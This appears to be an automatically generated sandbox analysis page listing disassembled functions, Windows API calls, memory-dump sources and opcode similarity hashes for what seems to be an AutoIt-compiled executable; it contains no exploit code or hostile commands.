                                                                                                                                                                                                                                                                            control_flow_graph 1008 261a9-261c0 1009 261c6-261db call 27ad5 1008->1009 1010 262a8-262ad 1008->1010 1013 261e1-261fd call 28577 1009->1013 1014 65278-65287 LoadStringW 1009->1014 1020 26203-26207 1013->1020 1021 652ae-652bc call 25cf9 1013->1021 1017 65292-6529b 1014->1017 1018 652a1-652a9 call 2bed9 1017->1018 1019 26229-262a3 call 426b0 call 262ae call 44cf3 Shell_NotifyIconW call 2bd98 1017->1019 1018->1019 1019->1010 1020->1017 1022 2620d-26224 call 26b7c call 27bb5 1020->1022 1021->1019 1031 652c2-652cd call 8a392 1021->1031 1022->1019 1038 652cf-652f5 call 2bf73 call 8a350 call 27bb5 call 2bd98 1031->1038 1039 652fa-65331 call 8a31c call 3fe6f call 26b7c call 25cf9 call 26b7c 1031->1039 1038->1039 1039->1019
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00065287
                                                                                                                                                                                                                                                                              • Part of subcall function 00028577: _wcslen.LIBCMT ref: 0002858A
                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00026299
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                            • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                            • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                            • Opcode ID: 82fe6cae5bb66b34416f7db1c5dd6d6984589dcdbada8cb11174547a89781b5a
                                                                                                                                                                                                                                                                            • Instruction ID: 47ef0760398ec4f9723d60ac238cacb6b47a161b293ba37780e731c8ad6366f3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82fe6cae5bb66b34416f7db1c5dd6d6984589dcdbada8cb11174547a89781b5a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57410A71408725AED311EB60EC41EEFBBDCAF45310F00462EF98992092EF359649C793
                                                                                                                                                                                                                                                                            Function 00030340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 000315F2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                            • Opcode ID: 84a520eb120e35b7eb3b1ab3cb293f6a3b7c86f38a2d6adaa60148e3b719444a
                                                                                                                                                                                                                                                                            • Instruction ID: 5e902fbabebfa9eb5405ec68c338cc52d6d925a852b7335c80095293a98707c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84a520eb120e35b7eb3b1ab3cb293f6a3b7c86f38a2d6adaa60148e3b719444a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6B2CC74A09701CFDB65CF18C4A0A6AB7F5BF89300F14892DE98A9B352D735ED41CB92
                                                                                                                                                                                                                                                                            Function 0004014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 000409D8
                                                                                                                                                                                                                                                                              • Part of subcall function 00043614: RaiseException.KERNEL32(?,?,?,000409FA,?,00000000,?,?,?,?,?,?,000409FA,00000000,000E9758,00000000), ref: 00043674
                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 000409F5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                            • Opcode ID: d340e67a9a201a809e3b366ec913f77263d88f20a6e1c25e63a61f015a569401
                                                                                                                                                                                                                                                                            • Instruction ID: 5e9c2689ce5a701f81a2188ce012fdd67e9eb43ae377a7f6707a4b1a6512b6ca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d340e67a9a201a809e3b366ec913f77263d88f20a6e1c25e63a61f015a569401
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F0AFB490420DB7CB10BEA4EC469DE77AC5F00350B604131BB14B65A3EB70EA5AC698
                                                                                                                                                                                                                                                                            Function 000A89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 000A8D52
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 000A8D59
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 000A8F3A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 146820519-0
                                                                                                                                                                                                                                                                            • Opcode ID: d181cd0f79f7fb0452149d8347ccd520d3031ebc458f07ad9775369490655c81
                                                                                                                                                                                                                                                                            • Instruction ID: 3a564e994761036de81a95b0be279e3a7802a785f19f8e59e3b5a4204f1c3dbe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d181cd0f79f7fb0452149d8347ccd520d3031ebc458f07ad9775369490655c81
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84127A71A08341DFD764DF28C484B6ABBE5BF89314F04896DE8899B352DB30E945CF92
                                                                                                                                                                                                                                                                            Function 00022793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0002327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000232AF
                                                                                                                                                                                                                                                                              • Part of subcall function 0002327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 000232B7
                                                                                                                                                                                                                                                                              • Part of subcall function 0002327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000232C2
                                                                                                                                                                                                                                                                              • Part of subcall function 0002327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000232CD
                                                                                                                                                                                                                                                                              • Part of subcall function 0002327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 000232D5
                                                                                                                                                                                                                                                                              • Part of subcall function 0002327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 000232DD
                                                                                                                                                                                                                                                                              • Part of subcall function 00023205: RegisterWindowMessageW.USER32(00000004,?,00022964), ref: 0002325D
                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00022A0A
                                                                                                                                                                                                                                                                            • OleInitialize.OLE32 ref: 00022A28
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00063A0D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                            • Opcode ID: 279d621fbb8e7b808e6419dd3405aa02ed0303f8420e040549b5f55f906ab5ef
                                                                                                                                                                                                                                                                            • Instruction ID: 326b100579164851a2ab5c5b5ed45c721e603de94644edbfd2a29d70eb7278ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 279d621fbb8e7b808e6419dd3405aa02ed0303f8420e040549b5f55f906ab5ef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6271AEB0902A058FE788EF79ED656B57BE0BB48B44740422AD008C7BB2EB7C5546FF54
                                                                                                                                                                                                                                                                            Function 00026679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0002663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0002668B,?,?,000262FA,?,00000001,?,?,00000000), ref: 0002664A
                                                                                                                                                                                                                                                                              • Part of subcall function 0002663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0002665C
                                                                                                                                                                                                                                                                              • Part of subcall function 0002663E: FreeLibrary.KERNEL32(00000000,?,?,0002668B,?,?,000262FA,?,00000001,?,?,00000000), ref: 0002666E
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000262FA,?,00000001,?,?,00000000), ref: 000266AB
                                                                                                                                                                                                                                                                              • Part of subcall function 00026607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00065657,?,?,000262FA,?,00000001,?,?,00000000), ref: 00026610
                                                                                                                                                                                                                                                                              • Part of subcall function 00026607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00026622
                                                                                                                                                                                                                                                                              • Part of subcall function 00026607: FreeLibrary.KERNEL32(00000000,?,?,00065657,?,?,000262FA,?,00000001,?,?,00000000), ref: 00026635
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                            • Opcode ID: da54a4bef4f664f1bed4b967dfb40990a3aa6c41d43f805a3127381001876ce7
                                                                                                                                                                                                                                                                            • Instruction ID: 625906e61a6e79d9c40dd4322e533f4cc4001f1c54726255ac65005037efaf54
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da54a4bef4f664f1bed4b967dfb40990a3aa6c41d43f805a3127381001876ce7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1111E776600215AACF14AB60EC06FEDBBA5AF50711F10442EF542A71C3EE77DA05DB50
                                                                                                                                                                                                                                                                            Function 00058782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                            • Opcode ID: e58d4288fa740d9d0992574854ef02c627904cdb30e526f49705e0b2f0ebca7e
                                                                                                                                                                                                                                                                            • Instruction ID: 6ae2f3d6f3c18c50d244abab1d11d29768433ac2767334e78c9d24ffc2743391
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e58d4288fa740d9d0992574854ef02c627904cdb30e526f49705e0b2f0ebca7e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C311367190410AAFCB05DF58E9449DF7BF4EF48300F108069FC09AB311DA31EA158B64
                                                                                                                                                                                                                                                                            Function 0004E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                            • Instruction ID: a8173867ea5c53f3a1f8aa53c84e8bf98e33df872d3edc59896a7cc1203975d0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BF02DB250161056D6713A2ADC05BEB33989F42331F104B36FC25931D3EB70DC0686DA
                                                                                                                                                                                                                                                                            Function 000266E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: aeeb0639940b88ea8329f0d984fef6e43f40bed0ecc352b26e0e6a7d18c8c8f1
                                                                                                                                                                                                                                                                            • Instruction ID: e52057df6296889ba821cb2bc0746753f6ddc96ede7b9de6064c6c3c1f4f3e03
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aeeb0639940b88ea8329f0d984fef6e43f40bed0ecc352b26e0e6a7d18c8c8f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49F039B1105722CFCB749F64E8A4856BBE5BF1432A3248A3EE1D787610C7769840DF50
                                                                                                                                                                                                                                                                            Function 0002684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                            • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                            • Instruction ID: c4532d48bf92c16cc9eb97b365670a401b439552195748ff3adcc4c84091bcbd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5F0F87550024DFFDF05DF90C941E9EBBB9FB04318F208545F9159A151C336EA21ABA1
                                                                                                                                                                                                                                                                            Function 0006071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00060A84,?,?,00000000,?,00060A84,00000000,0000000C), ref: 00060737
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                            • Opcode ID: d255e652d0806064962f3e5107aa9f85900c554fe4fdb97a475a2035166d2b8e
                                                                                                                                                                                                                                                                            • Instruction ID: 17ef08ec48004b53f953c2570fc762a3a59cb8ec1d84f64d1e3f8406df8fd081
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d255e652d0806064962f3e5107aa9f85900c554fe4fdb97a475a2035166d2b8e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CD06C3200010DBBDF028F84DD06EDA3BAAFB48714F014110BE1866020C736E821AB90
                                                                                                                                                                                                                                                                            Function 0009664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0008DC54: FindFirstFileW.KERNEL32(?,?), ref: 0008DCCB
                                                                                                                                                                                                                                                                              • Part of subcall function 0008DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0008DD1B
                                                                                                                                                                                                                                                                              • Part of subcall function 0008DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0008DD2C
                                                                                                                                                                                                                                                                              • Part of subcall function 0008DC54: FindClose.KERNEL32(00000000), ref: 0008DD43
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0009666E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                            • Opcode ID: 727853189b47befd2fc7618903924825a409d2d2ce0a71f57a2e11a916731364
                                                                                                                                                                                                                                                                            • Instruction ID: f59a3dce6e42ef052d7c32c36b038009769b5af07e8fe6e50ffde0d5d1a83289
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 727853189b47befd2fc7618903924825a409d2d2ce0a71f57a2e11a916731364
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F0A0362002108FDB14EF58E845BAEB7E5BF88760F04841AF9499B353CB74BC01CB94